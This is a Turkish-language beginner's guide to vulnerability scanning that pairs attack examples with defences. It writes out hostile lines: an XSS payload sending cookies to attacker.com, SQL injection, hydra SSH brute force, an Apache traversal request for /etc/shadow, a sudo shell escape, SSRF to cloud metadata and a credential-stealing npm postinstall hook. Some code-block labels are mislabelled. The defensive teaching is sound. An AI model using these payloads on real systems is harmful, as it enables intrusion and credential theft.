Güvenlik açığı taraması, yeni başlayanların eski yazılımları, açık portları, zayıf yapılandırmaları, güvensiz kimlik doğrulamayı, savunmasız kütüphaneleri ve potansiyel istismar yollarını saldırganlar bunlardan yararlanmadan önce otomatik olarak tespit ederek siber güvenlik risklerini anında azaltmalarını sağlar. Önem dereceleri ve düzeltme talimatları içeren raporlar sunarak fidye yazılımı salgınlarını, veri ihlallerini, hesapların ele geçirilmesini ve hizmet kesintilerini önlemenin en erişilebilir ve uygun maliyetli yollarından biri haline getirir. Ev ağlarını yöneten bireyler, müşteri verilerini savunan girişimler ve uyumluluk konusunda kesinlik arayan işletmeler için güvenlik açığı taraması, güvenli dijital esnekliğe yönelik en etkili temel adımı temsil eder.
Güvenlik Açığı Taraması Modern Güvenlik İçin Neden Önemlidir?
Modern altyapı kişisel cihazlara, kurumsal sunuculara, bulut ortamlarına, SaaS platformlarına ve üçüncü taraf bileşenlere dağıtılmıştır. Güvenlik açığı taraması bu yüzeylerde sürekli görünürlük sağlar ve ihlallere dönüşmeden önce zayıflıkları vurgular. Amacı istismar olan sızma testlerinin aksine, zafiyet taraması tekrarlanabilirlik, güvenlik, varlık kapsamı ve ölçülebilir iyileştirme sonuçlarını vurgular.
Ancak saldırganlar keşfi sürekli olarak otomatikleştirirler. Tarayıcıların önlemeye yardımcı olduğu şeylere yeni başlayanlara uygun bir örnek, aşağıdaki gibi otomatik bir keşif taramasıdır:
ngix
nmap -sV -Pn 192.168.1.0/24
Bu, ilk dayanak noktası olarak kullanılabilecek açık bağlantı noktalarını ve hizmetleri ortaya çıkarır. Tarama, bu tür açıkların fark edilmeden kalmamasını sağlar.

Güvenlik Açığı Taraması Adım Adım Nasıl Çalışır?
Varlık Sayımı ve Parmak İzi
Tarayıcı canlı ana bilgisayarları, sistem sürümlerini, açık portları, çalışan hizmetleri ve açık arayüzleri tanımlar.
Örnek saldırgan numaralandırması:
curl -I <http://target.com>
Güvenlik Açığı Korelasyonu ve Risk Puanlaması
Bulgular, aşağıdaki gibi yetkili güvenlik açığı veritabanlarıyla eşleştirilir:
- NIST: https://www.nist.gov
- MITRE CVE: https://cve.mitre.org
- CISA KEV: https://www.cisa.gov/known-exploited-vulnerabilities-catalog
Raporlama ve İyileştirme Kılavuzu
Raporlar aşağıdaki gibi konulara öncelik verir:
- Kritik uzaktan çalıştırma kusurları
- Kimlik doğrulama baypası
- Bulut depolama yanlış yapılandırması
- Zayıf şifreleme protokolleri
Güvenlik Açığı Taraması Türleri ve Tespit Ettikleri
| Tarama Türü | Algılama Odağı | Şiddet Aralığı |
|---|---|---|
| Ağ Maruziyet Taraması | Açık portlar, SMB kusurları, zayıf SSH | Yüksek |
| Web Uygulaması Taraması | SQLi, XSS, auth bypass, CSRF | Kritik |
| Bulut Yapılandırma Taraması | Genel kovalar, IAM ayrıcalık kayması | Yüksek |
| Bağımlılık Taraması | CVE etiketli kütüphaneler, tedarik zinciri açıkları | Orta |
Web Saldırısı Örnekleri ve Savunma Düzeltmeleri
SQL Enjeksiyon Saldırısı
Saldırı yükü:
vbnet
' UNION SELECT password FROM users --
Savunmasız uygulama:
ini
query = "SELECT * FROM users WHERE username = '" + userInput + "'";
Güvenli hafifletme:
python
cursor.execute("SELECT * FROM users WHERE username = %s", (userInput,))
Siteler Arası Komut Dosyası Oluşturma (XSS)
Saldırı yükü:
php
<script>fetch('<https://attacker.com/steal?cookie=>' + document.cookie)</script>
Savunma stratejisi şunları içerir:
- katı çıktı kodlaması
- CSP başlıkları
- sterilize edilmiş girdi işleme
Ağ Saldırı Örnekleri ve Sertleştirme Önlemleri
SSH Kaba Kuvvet Girişimi
Saldırı komutu:
nginx
hydra -L users.txt -P passwords.txt ssh://10.0.0.5
Defansif yapılandırma:
perl
PasswordAuthentication noAllowUsers [email protected].*
SMB Numaralandırma
Saldırgan araştırıyor:
nginx
smbclient -L //192.168.1.22/ -N
Hafifletme:
- SMBv1'i devre dışı bırak
- kimlik doğrulamayı zorla
- segment ağları
Sistem Düzeyinde İstismar Örnekleri
Apache Yol Geçişi (CVE-2021-41773)
Saldırı talebi:
perl
curl <http://target.com/cgi-bin/.%2e/%2e%2e/etc/shadow>
Etki azaltma referansı:
https://httpd.apache.org/security
Sudo Misconfig ile Ayrıcalık Artışı
Keşif:
nginx
sudo -l
Kötü niyetli yükseltme:
nginx
sudo vim -c ':!/bin/bash'
Savunma:
- sudoers'ı kısıtla
- günlük kaydını etkinleştir
- en az ayrıcalığı uygulamak
Bulut Güvenlik Açığı Örnekleri ve Karşı Önlemler
Kamu S3 Kovasına Maruz Kalma
Saldırgan numaralandırma:
bash
aws s3 ls s3://public-data-bucket --no-sign-request
Hafifletme:
- genel ACL'leri engelleme
- IAM sınır rollerini uygulama
Açıkta Bırakılan API Anahtarının Kötüye Kullanımı
Saldırı örneği:
powershell
curl ""
Savunma:
- sırlar rotasyonu
- ağ geçidi daraltma
- kapsamlandırılmış belirteçler
Ek Web İstismarı Örnekleri ve Savunma Uygulamaları
Sunucu Tarafı İstek Sahteciliği (SSRF)
Saldırganın niyeti: Bir sunucuyu yetkisiz dahili isteklerde bulunmaya zorlar.
Üst düzey faydalı yük konsepti:
YAKUT
http://target.com/fetch?url=http://169.254.169.254/latest/meta-data/
Risk: Bulut kimlik bilgilerinin veya dahili yönetici hizmetlerinin ifşa edilmesi. Savunma antrenmanları:
- URL izin listesi
- ağ çıkış filtreleme
- meta veri hizmeti v2 (AWS)
Dosya Yükleme Özelliklerinde Yol Manipülasyonu
Saldırgan yaklaşımı:
ini
filename = "../../../../tmp/shell.php"
Sonuç: Sistem dosyalarının üzerine yazmak veya kötü amaçlı komut dosyaları yerleştirmek. Savunma:
- katı dosya adı yeniden yazımını zorlama
- MIME türü doğrulaması
- tüm yüklemeleri webroot dışında depolayın
Derileştirme Saldırı Kalıpları
Saldırganın hedefi: Zararlı nesneleri güvensiz serileştirme rutinlerine enjekte edin.
Yüksek seviye sözde yük:
css
SerializedObject: { class: "Exec", cmd: "system('id')" }
Etki: Güvenlik açığı olan kütüphanelere bağlı olarak uzaktan kod yürütme. Savunma:
- güvenli olmayan serileştirmeden kaçının
- allow-list sınıflarını zorla
- kriptografik olarak imzalanmış nesneler kullanın
Ek Ağ Saldırı Kalıpları ve Güvenli Karşı Önlemler
Trafik Engelleme için ARP Sahtekarlığı
Saldırgan komut kavramı (işlevsel olmayan gösterim):
nginx
arp_spoof --target 10.0.0.12 --gateway 10.0.0.1
Hedef: Trafiği saldırgan makine üzerinden yönlendirin. Hafifletme:
- Dinamik ARP Denetimini Etkinleştirme
- kritik cihazlarda statik ARP girişleri
- TLS'yi her yerde uygulayın
DNS Önbellek Zehirlenmesi Girişimi
Saldırgan iş akışı:
- Çözümleyiciyi sahte yanıtlarla doldurma
- İşlem kimliklerini eşleştirmeye çalışın
- Sahte IP eşlemeleri ekleme
Örnek üst düzey yanıt yapısı:
daha az
;; CEVAP BÖLÜMÜ: example.com. 60 IN A 203.0.113.66
Savunma:
- DNSSEC
- rastgele kaynak bağlantı noktaları
- minimal yanıtlar modu
LDAP Numaralandırma ve Zayıf Kimlik Doğrulama
Saldırgan araştırması (sadece konsept):
lua
ldapsearch -x -h dc.company.local -b "dc=company,dc=local"
Risk: Ayrıcalıklı hesapların veya eski kimlik doğrulamasının keşfi. Hafifletme:
- Her yerde LDAPS
- anonim bağlamaları devre dışı bırak
- ayrıcalıklı grupları denetleme
Ek Sistem Düzeyinde Saldırı Vektörleri
Ayrıcalık Artışı için Çekirdek Bilgi Sızıntısı
Saldırganlar bellek sızdırmak için hatalı çekirdek modüllerinden yararlanabilir.
Üst düzey istismar akışı:
- Sürücüde tetikleyici taşması
- Başlatılmamış çekirdek tamponunu oku
- İşaretçi ofsetlerini çıkarma
- İstismar zincirini yeniden oluşturun
Savunma:
- düzenli çekirdek yaması
- kullanılmayan sürücüleri devre dışı bırakın
- çekirdek kilitleme modunu zorlama
Ayrıcalık Yükseltme için Kullanılan Zayıf Cron İşleri
Saldırgan gözlemliyor:
bash
/etc/cron.d/backup-script (world-writable)
Potansiyel suistimal:
- Yazılabilir komut dosyasına komut ekle
- Cron root olarak çalıştırılır
- Eskalasyon kazanıldı
Savunma:
- cron dosya izinlerini kısıtlama
- zorunlu kod imzalama
- merkezi iş izleme
Günlük Enjeksiyonu / Günlük Sahteciliği
Saldırgan girişimi:
pgsql
2025-01-01 12:00:00 - BİLGİ - Kullanıcı Giriş Yaptı: admin
İzinsiz girişleri gizlemek veya analistleri yanıltmak için kullanılır. Savunma:
- güçlü günlük bütünlüğü (WORM depolama)
- merkezi SIEM korelasyonu
- yalnızca ekleme günlük sunucuları
Ek Bulut ve Konteyner Saldırı Örnekleri
Kubernetes Yanlış Yapılandırılmış Gösterge Tablosuna Maruz Kalma
Saldırgan numaralandırma (kavram):
arduino
kube-scan --open-dashboard
Etki: Gösterge panelinde kimlik doğrulaması yoksa tam küme kontrolü. Savunma:
- genel gösterge tablolarını devre dışı bırakma
- RBAC kısıtlamaları
- ağ poli̇ti̇kalari
Konteyner Kaçış Girişimleri
Üst düzey saldırgan zinciri:
- Ayrıcalıksız konteyner çalıştırma
- İstismar monte edilmiş
/var/run/docker.sock - Yeni ayrıcalıklı konteyner oluşturma
- Ev sahibine kaçış
Savunma:
- Docker soket bağlantılarını devre dışı bırakma
- seccomp + AppArmor
- köksüz konteynerler
Yanlış Yapılandırılmış IAM Rol Zincirleme
Tipik sıra:
- Açık günlüklerden geçici kimlik bilgilerini çalma
- İlke yanlış yapılandırması yoluyla daha yüksek ayrıcalıklı rol üstlenme
- Kötü amaçlı altyapıyı dağıtın
Savunma:
- tüm roller için MFA'yı zorunlu kılma
- en az ayrıcalıklı IAM sınırı
- otomatik kimlik bilgisi rotasyonu
Genişletilmiş Tedarik Zinciri ve Bağımlılık Saldırısı Örnekleri
Bağımlılık Karışıklığı Saldırısı
Saldırgan paketi yayınlar:
c#
internal-lib-company
Versiyon: 99.99.99
Derleme sistemi saldırgan paketini yanlışlıkla genel kayıt defterinden çözümlüyor. Savunma:
- özel kayıt defteri sabitleme
- bağımlılık izin listeleri
- kapsam ad alanı uygulaması
Paket Yöneticilerinde Typosquatting
Saldırganların yükleyebileceği örnek isimler:
reqeusts(yerineistekleri)lodas(yerinelodash)
Etki: Geliştirme sırasında yüklenen kötü amaçlı yazılım. Savunma:
- paket bütünlüğü taraması
- lockfile uygulaması
- sağlama toplamı doğrulaması
Kötü Amaçlı NPM Yükleme Sonrası Komut Dosyaları
Saldırganlar aşağıdaki gibi komut dosyalarını silah olarak kullanır:
json
"scripts": { "postinstall": "node steal-credentials.js" }
Savunma:
- mümkün olduğunda yaşam döngüsü komut dosyalarını devre dışı bırakın
- kum havuzlu yapıları zorunlu kılma
- sürekli SBOM doğrulaması
Güvenlik Açığı Taraması Otomatik Doğrulama ile Entegre Edildiğinde
İş akışı doğal olarak akıllı sızma doğrulamasını (istismar edilebilirliği, yanal hareketi ve saldırı zinciri sıralamasını simüle eden platformlar gibi) içeriyorsa tarama, tespitten eyleme geçirilebilir risk önceliklendirmesine dönüşür. Bu uyumun mantıklı olduğu ortamlarda, otomatik saldırı muhakemesi karar verme sürecini hızlandırır ve düzeltme tahminlerini ortadan kaldırır.
Yeni Başlayanların Sık Karşılaştığı Zorluklar ve Pratik Çözümler
Zorluklar şunlardır:
- ezici tarama hacmi
- yanlış pozitifler
- yama önceliği hakkında belirsizlik
- dinamik bulut yüzeyleri
Çözümler şunları içerir:
- kimlik doğrulamalı tarama
- BT biletlemesinde düzeltme takibi
- varlık envanterleri
- yöneti̇ci̇ ri̇sk çevi̇ri̇si̇
Yeni Güvenlik Öğrencileri için Son Çıkarım
Güvenlik açığı taraması sadece giriş niteliğinde değil, temel bir konudur. Sızma testi, otomatik saldırı, yapay zeka odaklı güvenlik evrimi ve pratik savunma olgunluğuna yatırım yapan okuyucular için tarama, dijital esneklik için ölçülebilir, tekrarlanabilir, ölçeklenebilir iyileştirme sağlar.

